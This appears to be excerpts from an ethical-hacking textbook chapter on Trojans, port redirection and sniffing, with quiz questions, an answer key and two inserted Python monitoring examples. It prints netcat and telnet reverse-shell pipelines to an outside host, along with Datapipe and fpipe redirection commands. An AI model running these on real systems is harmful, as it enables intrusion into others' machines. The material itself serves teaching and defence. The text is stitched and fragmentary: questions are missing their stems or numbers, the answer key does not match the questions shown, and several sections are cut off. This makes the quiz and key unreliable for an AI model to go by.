a. net use /u:name * \\target_IP\share *
b. net use * \\target_IP\share * /u:name
c. net use * \\share\target_IP /u:name *
d. use net /u:name * \\target_IP\share *
5.
6. What is a good clue that the target system is using Kerberos authentication?
a. Port 99 was found active during the scanning phase
b. Port 88 was found active during the scanning phase
c. A lockout policy was discovered
d. Port 98 was found active during the scanning phase
7.
8. What can you infer by finding activity on port 445 during a scan?
a. SMB services are active, and the system is using Win2K or greater.
b. NetBIOS naming is being used on the system.
c. Kerberos authentication has been employed.
d. There is no port 445.
9.
1. Answer: b
2. Answer: c
3. Answer: a
4. Answer: b
5. Answer: d
6. Answer: b
7. Answer: d
8. Answer: a
9. Answer: b
10. Answer: d
11. Answer: b
12. Answer: c
13. Answer: d
14. Answer: a
15. Answer: a
16. Answer: d
17. Answer: c
18. Answer: c
19. Answer: c
20. Answer: a
Trojan Types
There are several types of Trojans; each behaves differently and produces differing results from the
others. Depending upon the type of Trojan, an attacker can use them to stage various types of
exploits.
Trojans can be:
Remote access Trojans (RATs)
Keystroke loggers or password sending Trojans
Software detection killers
Purely destructive or service denying Trojans
FTP Trojans
Some Trojans are programmed to open specific ports to allow access for exploitation. When a Trojan
is installed on a system, it often opens a high-numbered port. The open port can be scanned and
located, enabling an attacker to compromise the system.
After the server file has been installed on a victim's machine, often accompanied by changes to the
Registry to ensure that the Trojan is reactivated whenever the machine is restarted, the program
opens a port so that the hacker can connect. The hacker can then utilize the Trojan via this
connection to issue commands to the victim's computer. Some RATs even provide a message system
that notifies the hacker every time a victim logs on to the Internet.
Most RATs and backdoor Trojans use common specific ports. Table 8-1 shows some of these ports.
Table 8-1: Common Remote Access Port Numbers
NAME                 DEFAULT PORT       RELATED PROTOCOL
Back Orifice         31337              UDP
BO2K                 54320/54321        TCP/UDP
Beast                6666               TCP
Citrix ICA           1494               TCP/UDP
Donald Dick          23476/23477        TCP
Masters Paradise     40421-40426        TCP
                     49608/49609        TCP
NetBus               12345              TCP
Netcat               Various            TCP
pcAnywhere           5631/5632/65301    TCP
Reachout             43188              TCP
Remotely anywhere    2000/2001          TCP
Remote               135-139            TCP/UDP
Timbuktu             407                TCP/UDP
VNC                  5800/5801          TCP/UDP
Combined attack vectors are often used so that if the message doesn't carry the malware, the
attachment does. Email attachments are still the most common way to attack a PC, but the email
messages themselves are now used as attack vectors, with the malware embedded in the email
message. This means that just reading or previewing the message can launch an attack.
Email message attacks rely on malicious code embedded in messages in HTML format. Evil HTML
messages in conjunction with trusting email clients can easily infiltrate computers, installing Trojan
horses and opening backdoors for further invasion. One nasty trick adopted from spammers is to
place an opt-out link at the bottom of spam. When the link is clicked, a Trojan is installed on the PC.
A good example of an email Trojan horse is Sepuc. Victims normally have no idea that they're being
spied on. The email has no subject line and no visible text in the body of the message. If the user
opens the message, a small amount of malicious code hidden in the email attempts to exploit a known
vulnerability in Internet Explorer to force a download from a remote machine. If it succeeds, this file
downloads several other pieces of code and eventually installs a Trojan capable of harvesting data
from the PC and sending it to a remote machine.
Deception is a common vector for Trojans. Deception is aimed at a gullible user as the vulnerable
entry point. Most deception schemes require the unwitting cooperation of the computer's operator to
succeed. This section illustrates some of the common forms of attacks by deception.
Counterfeit websites use deception as the attack vector. They are intended to look genuine but are
used to plant malware. Often, they're used in conjunction with spam and pop-up pages to install
spyware, adware, hijackers, dialers, Trojans, or other malware. It can all happen as quickly as the
page loads or when a link is clicked.
Common Trojan Vectors for Malicious Code
HTML email and web pages can deliver malicious code in a variety of ways. Here are the various
means:
ActiveX controls. Browser security settings that prevent running unsigned or unverified ActiveX
controls can be overridden by launching HTML files from a local disk or changing system Registry
entries.
VBScript and Java scripts. Rogue scripts can automatically send data to a web server without
the owner's knowledge or use the computer for a distributed denial-of-service attack.
Iframes. An iframe embedded in an email message can be used to run some VB script; this
script can access the local file system to read or delete files.
Images. Embedded images can be dangerous and cause the execution of unwanted code. Web
bugs can also create privacy issues.
Flash applets. There aren't many incidents reported in the wild, but some bugs could be used to
execute arbitrary code.
Wrappers
It's getting harder and harder to infect a PC with a Trojan, as effective anti-malware software and
devices shorten the time between a zero-day outbreak and the remedy. One common and effective
way for an attacker to get a Trojan installed on the victim's computer is by using a wrapper.
A wrapper is a program used to combine two or more executables into a single packaged program.
The wrapper attaches a harmless executable, like a game, to a Trojan's payload, the executable code
that does the real damage, so that it appears to be a harmless file.
When the user runs the wrapped executable, it first runs the game or animation and then installs the
wrapped Trojan in the background, although the user sees only the animation. For example, a
common wrapped Trojan sends an animated birthday greeting that installs BO2K while the user
watches a dancing birthday cake. Figure 8-1 shows the wrapper concept.
Covert Communication
In the world of hacking, covert communication can be accomplished by using a covert channel. A
covert channel is a way of transmitting data by using a path differently from its original intention. We'll
examine the concept of covert channels before showing you how these channels are used in hacking.
The Orange Book defines two types of assurance: operational assurance and lifecycle assurance.
Operational assurance focuses on the basic features and architecture of a system, while lifecycle
assurance focuses on the controls and standards that are necessary for building and maintaining a
system. An example of an operational assurance is a feature that separates a security-sensitive code
from user code in a system's memory.
The operational assurance requirements specified in the Orange Book are as follows:
System architecture
System integrity
Covert channel analysis
Trusted facility management
Trusted recovery
TCSEC defines covert channels. An information transfer path within a system is a generic definition of
a channel. A channel may also refer to the mechanism by which the path is affected. A covert channel
is a communication channel that allows a process to transfer information in a manner that violates the
system's security policy. A covert channel is an information path that is not normally used for
communication within a system; therefore, it is not protected by the system's normal security
mechanisms. Covert channels are a secret way to convey information to another person or program.
There are two common types of covert channels: covert storage channels and covert timing channels.
Port Redirection
For a packet to reach its destination, it must have an IP address and a port number. Port numbers
range from 0 to 65535. Most applications use well-known ports. For example, DNS uses port 53,
whereas HTTP uses 80.
Therefore, hackers often must use port redirection to get their packets onto the target network.
Redirection works by listening to a certain configured port and redirecting all packets to a secondary
destination. This redirection usually occurs from the attackers system to a defaced key system with
access to the target network and then to the target network.
Some of the tools used for port redirection include reverse Telnet, datapipe, fpipe, rinetd, and netcat.
Most of these tools are protocol ignorant. They don't care what protocol is passed; they just act as the
conduit to move data from port to port through the network.
NetCat
Netcat is a port redirection tool that can be used with both Unix and Windows. It's very versatile and can
be used in combination with other redirectors listed in a moment. It can use either TCP or UDP and
can redirect inbound or outbound traffic from any port. In addition, it has built-in port-scanning
capabilities, a port randomizer, and source-routing capability.
For example, if the machine on 10.10.1.1 has a listening netcat service on TCP 80 and TCP 25 and is
configured correctly for TCP 80 to be inbound and TCP 25 to be outbound between the compromised
system, the command to shell remote commands is:
C:\> nc 10.10.1.1 80 | cmd.exe | nc 10.10.1.1 25
Reverse Telnet
A common redirection technique, reverse Telnet, is very fast and simple because uploading files is not
usually necessary. It is called reverse Telnet because it uses Telnet to connect to listening NetCat
windows and then feeds the commands from one window into the reverse Telnet stream, sending
output into the other window.
Reverse Telnet is executed by starting two NetCat shells on a machine:
C:\> nc -vv -l -p 80
E:\> nc -vv -l -p 25
The attacker will use a Unix command on the target system to take input from port 25 and pipe it to
the local shell to execute the command and will then pipe the output back to the attackers port 80
shell:
[root@localhost]# sleep 10000 | telnet 10.10.1.1 80 | /bin/bash | telnet 10.10.1.1 25
Datapipe
A popular Unix redirection tool is Datapipe
(http://packetstormsecurity.nl/Exploit_Code_Archive/datapipe.c). Datapipe must be run on both ends
of the attack: the attackers originating computer and the compromised target behind a firewall.
The syntax to use it is:
datapipe <localport> <remoteport> <remotehost>
For example, to listen to port 65000 and forward the traffic to port 139 on a compromised WinNT
system at address 10.10.1.12, type:
datapipe 65000 139 10.10.1.12
Then the hacker would enter on his or her system:
datapipe 139 65000 10.10.1.9
The first command instructs the compromised system to redirect port 139 traffic to port 65000 (which
you should already have determined is not being blocked at the firewall). The second command takes
the hackers traffic on port 65000 and moves it to port 139, which allows the hacker to set up a null
session with the target.
Fpipe
Fpipe is a TCP source port forwarder and redirector developed by Foundstone. It can create a TCP
stream with a source port of your choice. It works like Datapipe but is designed for Windows systems
rather than Unix.
An example of its command syntax is:
fpipe -l 69 -r 53 -u 10.2.2.2
This means:
fpipe -l <listen> 69 <on port 69> -r <redirect> 53 <to port 53> -u <use UDP> 10.2.2.2 <destination IP address of redirection>
Rinetd
Also called the reverse inet daemon, rinetd (www.boutell.com/rinetd/index.html) redirects TCP
connections from one IP address and port to another. Rinetd will redirect only connections that require
one port, thus excluding FTP which requires both ports 20 and 21.
Rinetd uses a very easy syntax:
bindaddress bindport connectaddress connectport
For example, 10.10.1.17 23 10.1.1.3 23 redirects all connections to port 23 from the address
10.10.1.17, through rinetd, and then to port 23 on 10.1.1.3.
Rinetd can be run from a configuration file such as /etc/rinetd.conf on a Unix machine with the
command:
[root@localhost]# rinetd -c config_file
In this example, the -c switch is used to point rinetd to a configuration file location different from the
original.
Tini
Tini (http://ntsecurity.nu/toolbox/tini) is a very small Trojan backdoor program, only 3 KB in size, and
programmed in assembly language. It takes minimal bandwidth to get onto a victim's computer and takes
up little disk space.
Tini only listens on port 7777 and runs a command prompt when someone attaches to this port. The
port number is fixed and cannot be customized. This makes it easier for a victim system to detect by
scanning for port 7777. From a Tini client you can telnet to Tini server at port 7777.
QAZ
QAZ is a companion virus that can spread over the network. It also has a backdoor that will enable a
remote user, using port 7597, to connect to and control the computer. QAZ renames the notepad
program to note.com and modifies the Registry key:
HKLM\software\Microsoft\Windows\CurrentVersion\Run.
Donald Dick
Donald Dick is another remote access tool that enables a user to control another computer over a
network. It uses a client-server architecture with the server residing on the victims computer. The
attacker uses the client to send a command through TCP or SPX to the victim at a predefined port.
Donald Dick uses default ports of either 23476 or 23477.
NetBus
NetBus is a Windows remote access tool created in 1998 and used as a backdoor. Translated from
Swedish, the name means NetPrank; it was in wide circulation before Back Orifice was released.
There are two components to NetBus's client-server architecture. The server piece is a 500 KB
EXE file with various names like Patch.exe and SysEdit.exe.
When installed and run for the first time on the target computer, the server code modifies the Windows
Registry so that it starts automatically on each system startup and listens for connections on port
12345 or 12346.
The client code is a GUI that lets the attacker execute tasks on the remote target server, such as
running keyloggers, launching programs, shutting the system down, and other tasks.
Encryption. This encrypts the data sent between the BO2K GUI and the server.
BOSOCK32. This provides stealth capabilities by using ICMP instead of TCP/UDP.
STCPIO. This provides encrypted flow control between the GUI and the server, making the traffic
more difficult to detect on the network.
Soon after BO appeared, a category of cleaners emerged, claiming to be able to detect and remove
BO. BOSniffer turned out to be one such Trojan that in reality installed Back Orifice under the pretext
of detecting and removing it. It announces itself on an IRC channel #BO_OWNED with a random
username.
SubSeven
Another Trojan that has lasted a long time is SubSeven, although it's becoming less and less of a
problem. SubSeven is a backdoor program that enables others to gain full access to Windows
systems through the network. The program consists of three different components: client
(SubSeven.exe), server (Server.exe), and a server configuration utility (EditServer.exe). The
client is a GUI used to connect to a server through a network or internet connection.
Other Notables
Following is a list of still more Trojans.
Whack-A-Mole. A popular delivery vehicle for NetBus or BO servers is a game called Whack-A-Mole,
which is a single executable called whackamole.exe. Whack-A-Mole installs a NetBus or
BO server and starts the program at every reboot.
Senna Spy. Senna Spy Generator 2.0 (http://sennaspy.cjb.net) is a Trojan code generator. Its
able to create a Visual Basic source code for a Trojan based on a few options. This Trojan is
compiled from generated source code.
Hard Disk Killer (HDKP4.0). The Hard Drive Killer Pro series of programs can fully and
permanently destroy all data on any given DOS or Windows hard drive. The program, once
executed, reboots the system within a few seconds and then unrecoverably reformats all hard
drives attached to the system within one to two seconds, regardless of the size of the hard drive.
FireKiller 2000. FireKiller 2000 will kill any virus protection software and is also intended to
disable a user's personal firewall. For example, if you have Norton Anti-virus auto scan in your
taskbar and ATGuard Firewall activated, this program will kill both on execution, making the
installations of both unusable on the hard drive, requiring reinstallation of the software. It destroys
most protection software and software firewalls such as AtGuard, Conseal, Norton Anti-Virus, and
McAfee Anti-Virus.
Beast. Beast is a powerful Trojan RAT. One of the features of Beast is that it is an all-in-one
Trojan; that is, the client, server, and server editor programs are bundled into one application.
Tripwire
The protection system Tripwire (www.tripwire.com) has been around for quite a while. It automatically
calculates cryptographic hashes of all key system files or any file that you want to monitor for
modifications. Tripwire works by creating a baseline snapshot of the system. It will then periodically
scan those files and recalculate the information to see if any of the information has changed. It will
raise an alarm if changes are detected.
Fport
Fport, by Foundstone (www.foundstone.com), identifies unknown open ports and their associated
applications. Fport reports all open TCP/IP and UDP ports and maps them to the owning application.
This is the same information you would see using the netstat -an command, but it also maps
those ports to running processes with the PID, process name, and path. Fport can be used to quickly
identify unknown open ports and their associated applications.
TCPView
TCPView is a Windows program that will show you detailed listings of all TCP and UDP endpoints on
your system, including the local and remote addresses and state of TCP connections. On Windows
NT, 2000, and XP, TCPView also reports the name of the process that owns the endpoint. TCPView
provides a more informative and conveniently presented subset of the Netstat program that ships with
Windows. The TCPView download includes Tcpvcon, a command-line version with the same
functionality.
TCPView works on Windows NT/2000/XP and Windows 98/Me. You can use TCPView on Windows
95 if you get the Windows 95 Winsock 2 Update from Microsoft.
It has an easy-to-use interface and can output to a text file.
Tcpvcon is the command-line version of TCPView. Its usage is similar to that of the built-in Windows
netstat utility. Just typing tcpvcon in a CMD box will output:
[TCP] C:\Program Files\Common Files\Symantec Shared\ccProxy.exe
PID: 1360  State: ESTABLISHED  Local: D5NV1CC1:1025  Remote: D5NV1CC1:3831
PID: 1360  State: ESTABLISHED  Local: D5NV1CC1:1025  Remote: D5NV1CC1:3864
PID: 1360  State: ESTABLISHED  Local: D5NV1CC1:1025  Remote: D5NV1CC1:3866
PID: 1360  State: ESTABLISHED  Local: D5NV1CC1:1025  Remote: D5NV1CC1:3869
PID: 1360  State: ESTABLISHED  Local: D5NV1CC1:1025  Remote: D5NV1CC1:3870
PID: 1360  State: ESTABLISHED  Local: D5NV1CC1:1025  Remote: D5NV1CC1:3871
PID: 1360  State: ESTABLISHED  Local: D5NV1CC1:1025  Remote: D5NV1CC1:3884
PID: 1476  State: ESTABLISHED  Local: D5NV1CC1:3823  Remote: D5NV1CC1:3824
PID: 1476  State: ESTABLISHED  Local: D5NV1CC1:3824  Remote: D5NV1CC1:3823
PID: 1476  State: ESTABLISHED  Local: D5NV1CC1:3825  Remote: D5NV1CC1:3826
PID: 1476  State: ESTABLISHED  Local: D5NV1CC1:3826  Remote: D5NV1CC1:3825
PID: 1476  State: ESTABLISHED  Local: D5NV1CC1:3831  Remote: D5NV1CC1:1025
PID: 1476  State: ESTABLISHED  Local: D5NV1CC1:3864  Remote: D5NV1CC1:1025
PID: 1476  State: ESTABLISHED  Local: D5NV1CC1:3866  Remote: D5NV1CC1:1025
PID: 1476  State: ESTABLISHED  Local: D5NV1CC1:3869  Remote: D5NV1CC1:1025
PID: 1476  State: ESTABLISHED  Local: D5NV1CC1:3870  Remote: D5NV1CC1:1025
PID: 1476  State: ESTABLISHED  Local: D5NV1CC1:3871  Remote: D5NV1CC1:1025
PID: 1476  State: ESTABLISHED  Local: D5NV1CC1:3884  Remote: D5NV1CC1:1025
PID: 1360  State: ESTABLISHED  Local: d5nv1cc1:3832  Remote: va-in-f104.google.com:http
PID: 1360  State: ESTABLISHED  Local: d5nv1cc1:3865  Remote: a72-246-19-8.deploy.akamaitechnologies.com:http
PID: 1360  State: ESTABLISHED  Local: d5nv1cc1:3867  Remote: a72-246-19-8.deploy.akamaitechnologies.com:http
PID: 1360  State: ESTABLISHED  Local: d5nv1cc1:3873  Remote: a72-246-19-8.deploy.akamaitechnologies.com:http
PID: 1360  State: ESTABLISHED  Local: d5nv1cc1:3875  Remote: 65.54.195.185:http
PID: 1360  State: ESTABLISHED  Local: d5nv1cc1:3877  Remote: a72-246-19-8.deploy.akamaitechnologies.com:http
PID: 1360  State: ESTABLISHED  Local: d5nv1cc1:3885  Remote: a72-246-19-18.deploy.akamaitechnologies.com:http
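The record layout above can be parsed mechanically, which is how a reviewer turns a tcpvcon dump into a list of exposed ports and of local proxy relationships. The following is an added Python example, not part of the book or of the Sysinternals tools; the sample output, image paths, PIDs and the unknown.exe listener are constructed, and the allow-list of image directories is an assumed local policy.

```python
import re

# Constructed sample in the record layout tcpvcon prints: a "[PROTO] image path"
# line followed by indented PID/State/Local/Remote lines. The paths, PIDs and the
# unknown.exe listener are made up for this demonstration.
SAMPLE = """\
[TCP] C:\\Program Files\\Common Files\\Symantec Shared\\ccProxy.exe
        PID:    1360
        State:  ESTABLISHED
        Local:  D5NV1CC1:1025
        Remote: D5NV1CC1:3831
[TCP] C:\\Program Files\\Mozilla Firefox\\firefox.exe
        PID:    1476
        State:  ESTABLISHED
        Local:  D5NV1CC1:3831
        Remote: D5NV1CC1:1025
[TCP] C:\\Program Files\\Common Files\\Symantec Shared\\ccProxy.exe
        PID:    1360
        State:  ESTABLISHED
        Local:  d5nv1cc1:3832
        Remote: va-in-f104.google.com:http
[TCP] C:\\Users\\Public\\unknown.exe
        PID:    4242
        State:  LISTENING
        Local:  0.0.0.0:31337
        Remote: 0.0.0.0:0
"""

HEADER = re.compile(r"^\[(TCP|UDP)\]\s+(.*)$")
FIELD = re.compile(r"^\s+(PID|State|Local|Remote):\s*(.*)$")


def parse_tcpvcon(text):
    """Turn tcpvcon's multi-line records into a list of dicts, one per endpoint."""
    records, current = [], None
    for line in text.splitlines():
        m = HEADER.match(line)
        if m:
            current = {"proto": m.group(1), "path": m.group(2).strip()}
            records.append(current)
            continue
        m = FIELD.match(line)
        if m and current is not None:
            key, value = m.group(1).lower(), m.group(2).strip()
            current[key] = int(value) if key == "pid" else value
    return records


def split_endpoint(endpoint):
    """'host:port' -> (host, port). The port may be a service name such as 'http'
    because tcpvcon shows resolved names, as in the output above."""
    host, _, port = endpoint.rpartition(":")
    return host.lower(), port


def listeners(records):
    """(pid, image path, port) for each LISTENING socket: the machine's exposed ports."""
    return [(r["pid"], r["path"], split_endpoint(r["local"])[1])
            for r in records if r.get("state") == "LISTENING"]


def loopback_pairs(records):
    """Find established connections whose endpoints mirror each other. That is the
    footprint of a local proxy such as ccProxy: the browser connects to it on a
    loopback port and the proxy makes the outbound connection. Returns a set of
    frozenset({pid_a, pid_b})."""
    owner = {}
    for r in records:
        if r.get("state") == "ESTABLISHED":
            owner[(split_endpoint(r["local"]), split_endpoint(r["remote"]))] = r["pid"]
    pairs = set()
    for (local, remote), pid in owner.items():
        peer = owner.get((remote, local))
        if peer is not None and peer != pid:
            pairs.add(frozenset({pid, peer}))
    return pairs


def unexpected_listeners(records, allowed_prefixes):
    """Listeners whose image path lies outside the allowed directories. The
    allow-list is an assumed local policy, not anything tcpvcon provides."""
    return [entry for entry in listeners(records)
            if not any(entry[1].lower().startswith(p.lower()) for p in allowed_prefixes)]
```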
Process Viewer
Process Viewer (PrcView) (www.teamcti.com/pview/prcview.htm) is a free GUI-based process viewer
utility that displays detailed information about processes running under Windows. For each process it
displays memory, threads, and module usage. For each DLL, it shows full path and version
information. PrcView comes with a command-line version that allows you to write scripts to check
whether a process is running and stop it, if necessary.
PrcView provides an extensive alphabetical list of processes that can be saved in a text format.
Inzider
Inzider (http://ntsecurity.nu/toolbox/inzider/) is another utility that tracks processes and ports. Like
Process Viewer, it lists processes in your Windows system and the ports to which each one is
listening. For instance, under Windows NT/2K, BO2K injects itself into other processes, so it is not
visible in the Task Manager as a separate process. When you run Inzider, you will see the port BO2K
has bound in its host process. Unfortunately, Inzider has stability issues with Windows, causing it to
crash. In rare cases, it may damage the system.
Sniffers
Sniffing is the process of gathering traffic from a network by capturing the data as they pass and
storing them to analyze later. A protocol analyzer can be used to capture data packets that are later
decoded to collect information such as passwords or infrastructure configurations.
A sniffer is a piece of software that captures the traffic flowing into and out of a computer attached to a
network. Simply put, sniffers monitor network data. A sniffer can be a self-contained software program
or a hardware device with the appropriate software or firmware programming. Sniffers usually act as
network probes or snoops. They examine network traffic but do not intercept or alter it.
Some sniffers work only with TCP/IP packets, but the more sophisticated tools can work with many
other protocols and at lower levels such as the Ethernet frame.
A sniffer attack is commonly used to grab logins and passwords that are traveling around on the
network. Users of computer networks unwittingly disclose sensitive information about themselves
through the use of insecure software and protocols. Standard implementations of widely adopted
protocols such as Windows file sharing (CIFS/SMB), Telnet, POP3, HTTP, and FTP transmit login
passwords in clear text, exposing an extremely large segment of the Internet population to sniffing-related attacks.
Popular attack methods that utilize sniffing include man-in-the-middle attacks and session hijacking
exploits, using MAC flooding and ARP spoofing.
Sniffing Exploits
Sniffing can be active or passive. Passive sniffing is performed on a network hub and merely involves
examining the packets that travel through a hub. Hubs operate at the Physical Layer of the OSI
model. Hubs are used to connect multiple LAN devices, such as servers and workstations. They do
not add much intelligence to the communications process, however, as they don't filter packets,
examine addressing, or alter the data packet. Figure 8-3 shows a repeater or hub amplifying the
network signal.
ARP Spoofing
To understand the technique of ARP spoofing (also called ARP poisoning), let's first look at the
Address Resolution Protocol (ARP) process.
IP needs to know the hardware address of the packet's destination so it can send it. ARP is used to
match an IP address to a Media Access Control (MAC) address. ARP allows the 32-bit IP address to
be matched up with this hardware address.
A MAC address is a 6-byte, 12-digit hexadecimal number subdivided into two parts. The first three
bytes (or first half) of the MAC address is the manufacturer's identifier (see Table 8-2). This can be a
good troubleshooting aid if a network device is acting up, as it will isolate the brand of the failing
device. The second half of the MAC address is the serial number the manufacturer has assigned to
the device.
Table 8-2: Common Vendor MAC Addresses
FIRST THREE BYTES   MANUFACTURER
00000C              Cisco
0000A2              Bay Networks
0080D3              Shiva
00AA00              Intel
02608C              3COM
080007              Apple
080009              Hewlett-Packard
080020              Sun
08005A              IBM
ARP interrogates the network by sending out a broadcast seeking a network node that has a specific
IP address and then asking it to reply with its hardware address. ARP maintains a dynamic table
(known as the ARP cache) of these translations between IP addresses and MAC addresses so that it
has to broadcast a request to every host only the first time it is needed. Figure 8-5 shows a flow chart
of the ARP decision process.
2. The attacker sends a fake ARP response to remap the default router's IP to the attacker's
MAC.
3. The victim sends traffic destined for the outside world based on a poisoned ARP table entry.
4. The victim's redirected packets are forwarded through the switch to the attacker's PC.
5. The attacker sniffs the traffic from the link and saves it for later examination.
6. The packets are forwarded from the attacker's machine to the actual default router for delivery
to the outside world.
MAC Flooding
MAC flooding is another technique that allows an attacker to sniff a switched network. MAC flooding is
the act of attempting to overload the switch's Content Addressable Memory (CAM) table.
Some switches have a limited area where they store the CAM, which is a lookup table that enables
the switch to know through which port to send each specific packet. If the CAM table fills up and
the switch can hold no more entries, it often fails open, which means that all frames start flooding
out of all ports of the switch, allowing the attacker to sniff much more traffic.
Two issues arise with the execution of MAC flooding: it may draw attention to the attacker, due to the
quantity of data being injected into the network, and the sniffer must operate on a different network
segment than the injection, since the quantity of data could prevent the capture from working properly.
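The two techniques just described leave distinct traces on the wire, and one monitor can watch for both. The following is an added example, not from the book: it decodes raw ARP replies, alerts when an IP address (above all the default router's) is re-announced from a different MAC, naming the vendor from Table 8-2, and counts distinct source MACs per switch port to spot CAM-table flooding. All frames, addresses, the port numbers and the per-port limit are constructed for the demonstration.

```python
import struct
from collections import defaultdict

# Manufacturer prefixes from Table 8-2 (first three bytes of the MAC address).
OUI_VENDORS = {
    "00000C": "Cisco", "0000A2": "Bay Networks", "0080D3": "Shiva",
    "00AA00": "Intel", "02608C": "3COM", "080007": "Apple",
    "080009": "Hewlett-Packard", "080020": "Sun", "08005A": "IBM",
}
ETHERTYPE_ARP = 0x0806
ARP_REPLY = 2


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def ip_str(raw):
    return ".".join(str(b) for b in raw)


def vendor(mac):
    """Look up the manufacturer half of a MAC address in Table 8-2."""
    return OUI_VENDORS.get(mac.replace(":", "")[:6].upper(), "unknown")


def parse_frame(frame):
    """Ethernet II header: destination MAC, source MAC, EtherType, then payload."""
    dst, src, etype = struct.unpack("!6s6sH", frame[:14])
    return mac_str(dst), mac_str(src), etype, frame[14:]


def parse_arp(payload):
    """Decode an Ethernet/IPv4 ARP packet (RFC 826 layout); None for other kinds."""
    htype, ptype, hlen, plen, oper, sha, spa, tha, tpa = struct.unpack(
        "!HHBBH6s4s6s4s", payload[:28])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return {"oper": oper, "sha": mac_str(sha), "spa": ip_str(spa),
            "tha": mac_str(tha), "tpa": ip_str(tpa)}


def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    """Build a raw ARP reply frame; used here only to construct sample traffic."""
    sha = bytes.fromhex(sender_mac.replace(":", ""))
    tha = bytes.fromhex(target_mac.replace(":", ""))
    spa = bytes(int(o) for o in sender_ip.split("."))
    tpa = bytes(int(o) for o in target_ip.split("."))
    eth = struct.pack("!6s6sH", tha, sha, ETHERTYPE_ARP)
    arp = struct.pack("!HHBBH6s4s6s4s", 1, 0x0800, 6, 4, ARP_REPLY, sha, spa, tha, tpa)
    return eth + arp


class L2Monitor:
    """Watches frames copied from a switch: flags ARP replies that remap a known IP
    (the default router above all) and ports that suddenly source many MACs."""

    def __init__(self, gateway_ip, macs_per_port_limit=8):
        self.gateway_ip = gateway_ip
        self.limit = macs_per_port_limit
        self.bindings = {}                 # ip -> first MAC seen, like an ARP cache
        self.port_macs = defaultdict(set)  # port -> source MACs seen, like the CAM table

    def feed(self, frame, port):
        """Process one frame seen on `port`; return a list of alert strings."""
        alerts = []
        _dst, src, etype, payload = parse_frame(frame)
        # MAC flooding: an access port legitimately sources only a handful of MACs.
        self.port_macs[port].add(src)
        if len(self.port_macs[port]) == self.limit + 1:
            alerts.append(f"port {port}: more than {self.limit} source MACs, possible CAM flooding")
        if etype == ETHERTYPE_ARP:
            arp = parse_arp(payload)
            if arp and arp["oper"] == ARP_REPLY:
                alerts.extend(self._check_binding(arp["spa"], arp["sha"]))
        return alerts

    def _check_binding(self, ip, mac):
        known = self.bindings.setdefault(ip, mac)
        if known == mac:
            return []
        who = "default router" if ip == self.gateway_ip else "host"
        return [f"{who} {ip} remapped from {known} ({vendor(known)}) "
                f"to {mac} ({vendor(mac)})"]


def demo():
    """Constructed traffic: the router announces itself twice, a third host then
    claims the router's IP, and one port sources six different MACs."""
    gw_ip, gw_mac = "192.168.0.1", "00:00:0c:aa:bb:01"                 # Cisco prefix
    victim_mac, other_mac = "08:00:09:11:22:33", "08:00:20:44:55:66"  # HP, Sun prefixes
    mon = L2Monitor(gw_ip, macs_per_port_limit=4)
    alerts = []
    for _ in range(2):
        alerts += mon.feed(build_arp_reply(gw_mac, gw_ip, victim_mac, "192.168.0.100"), port=1)
    alerts += mon.feed(build_arp_reply(other_mac, gw_ip, victim_mac, "192.168.0.100"), port=7)
    for i in range(6):
        fake = f"02:00:00:00:00:{i:02x}"
        alerts += mon.feed(build_arp_reply(fake, f"10.0.0.{i}", victim_mac, "192.168.0.100"), port=9)
    return alerts
```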
Sniffing Tools
A host of sniffing tools are out there, some free and some costly, and all useful for passive and active
sniffing, ARP spoofing, MAC flooding, and DNS poisoning.
Snort
Snort (www.snort.org) is a freeware lightweight IDS and general-purpose sniffer for various versions
of Linux, Unix, and Windows. There are three main modes in which Snort can be configured: sniffer,
packet logger, and network intrusion detection system.
The sniffer mode simply reads the packets off of the network and displays them for you in a
continuous stream on the console. Packet logger mode logs the packets to the disk. Network intrusion
detection mode is the most complex and customizable configuration, allowing Snort to analyze
network traffic for matches against a user-defined rule set.
Dsniff
Dsniff (www.monkey.org/~dugsong/dsniff/) is a collection of tools for network auditing and penetration
testing. Dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf, and webspy passively monitor a network for
interesting data (passwords, email, files, and so on). Arpspoof, dnsspoof, and macof facilitate the
interception of network traffic normally unavailable to an attacker (for instance, due to Layer-2
switching). Sshmitm and webmitm implement active monkey-in-the-middle attacks against redirected
SSH and HTTPS sessions by exploiting weak bindings in ad-hoc PKIs. Monkey-in-the-middle attacks
are similar to man-in-the-middle attacks. They differ, however, in that the attacker controls both sides
of the conversation, posing both as the sender to the receiver and the receiver to the sender.
Ethereal
Ethereal (www.ethereal.com) is a free network protocol analyzer for Unix and Windows. It allows
users to examine data from a live network or from a capture file on disk. It can interactively browse the
capture data, viewing summary and detail information for each packet. Ethereal has several powerful
features, including a rich display filter language and the ability to view the reconstructed stream of a
TCP session and parse an 802.11 packet.
Cain (www.oxid.it/cain.html). This is a multipurpose tool that can perform ARP spoofing. It
allows easy recovery of various kinds of passwords by sniffing the network, cracking encrypted
passwords using dictionary, brute-force and cryptanalysis attacks, recording VoIP conversations,
decoding scrambled passwords, recovering wireless network keys, revealing password boxes,
uncovering cached passwords, and analyzing routing protocols.
Sniffit (http://reptile.rug.ac.be/~coder/sniffit/sniffit.html or
www.symbolic.it/Prodotti/sniffit.html). This is a freeware general-purpose sniffer for various
versions of Linux, Unix, and Windows.
WinDump (http://netgroup-serv.polito.it/windump). Another freeware Windows general-purpose sniffer, WinDump is based on TCPDump.
Mailsnarf. This is capable of capturing and outputting SMTP mail traffic that is sniffed on the
network.
Webspy. This allows the user to see all the Web pages visited by the victim.
Assessment Questions
Answers to these questions may be found in Appendix A.
1.
2.
3.
4.
5.
6.
7.
8.
c. A way of transmitting data by using a path differently from its original intention
d. A program that poisons the ARP cache
9.
d. ARP poisoning
18. What is Ethereal?
a. It redirects port 139 to port 65000 on the target machine.
b. It poisons the ARP cache.
c. It floods a switched network with Ethernet frames with random hardware
addresses.
d. It is free network protocol analyzer for Unix and Windows.
19. Which choice is not a definition of a Trojan horse?
a. A program that redirects port traffic
b. An unauthorized program contained within a legitimate program
c. Any program that appears to perform a desirable and necessary function but that,
because of hidden and unauthorized code, performs functions unknown and
unwanted by the user
d. A legitimate program that has been altered by the placement of unauthorized code
within it
20. Which Trojan uses port 31337?
a. NetBus
b. Donald Dick
c. Back Orifice
d. Beast
21. Which tool can be used for port redirection?
a. Loki
b. Datapipe
c. Tini
d. Donald Dick
22. Which statement about Fpipe is correct?
a. Datapipe-type utility for Windows
b. Datapipe-type utility for UNIX
c. UDP source port forwarder and redirector
